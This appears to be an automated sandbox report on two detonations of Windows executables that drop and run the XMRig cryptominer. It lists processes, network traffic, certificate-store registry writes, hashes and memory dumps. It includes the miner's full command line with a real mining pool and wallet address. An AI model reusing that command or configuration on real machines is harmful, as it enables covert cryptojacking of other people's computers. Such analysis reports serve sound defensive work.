memory/1232-52-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-53-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-54-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-55-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-56-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-57-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-58-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-59-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-60-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-61-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-62-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-63-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-64-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-65-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-66-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-67-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-68-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-69-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-70-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-71-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-72-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-73-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-74-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-75-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-76-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-77-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-78-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-79-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-80-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-81-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-82-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-83-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-84-0x00007FF605320000-0x00007FF605E23000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:07
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1786s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3552 wrote to memory of 4960 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3552 wrote to memory of 4960 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 52.111.229.43:443 | tcp | |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4960-16-0x0000026A2EC60000-0x0000026A2EC80000-memory.dmp
memory/4960-17-0x0000026A30460000-0x0000026A30480000-memory.dmp
memory/4960-18-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-19-0x0000026A304A0000-0x0000026A304C0000-memory.dmp
memory/4960-20-0x0000026A30480000-0x0000026A304A0000-memory.dmp
memory/4960-21-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-22-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-25-0x0000026A30480000-0x0000026A304A0000-memory.dmp
memory/4960-24-0x0000026A304A0000-0x0000026A304C0000-memory.dmp
memory/4960-23-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-26-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-27-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-28-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-29-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-30-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-31-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-32-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-33-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-34-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-35-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-36-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-37-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-38-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-39-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-40-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-41-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-42-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-43-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-44-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-45-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-46-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-47-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-48-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-49-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-50-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-51-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-52-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-53-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-54-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-55-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-56-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-57-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-58-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-59-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-60-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-61-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-62-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-63-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-64-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-65-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-66-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-67-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-68-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-69-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-70-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-71-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-72-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-73-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-74-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-75-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-76-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-77-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-78-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-79-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-80-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-81-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-82-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-83-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-84-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:08
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1324 wrote to memory of 4168 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1324 wrote to memory of 4168 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.64.52.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4168-16-0x00000250FFFC0000-0x00000250FFFE0000-memory.dmp
memory/4168-17-0x0000025080030000-0x0000025080050000-memory.dmp
memory/4168-18-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-20-0x0000025090A10000-0x0000025090A30000-memory.dmp
memory/4168-19-0x00000250909F0000-0x0000025090A10000-memory.dmp
memory/4168-21-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-22-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-25-0x0000025090A10000-0x0000025090A30000-memory.dmp
memory/4168-24-0x00000250909F0000-0x0000025090A10000-memory.dmp
memory/4168-23-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-26-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-27-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-28-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-29-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-30-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-31-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-32-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-33-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-34-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-35-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-36-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-37-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-38-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-39-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-40-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-41-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-42-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-43-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-44-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-45-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-46-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-47-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-48-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-49-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-50-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-51-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
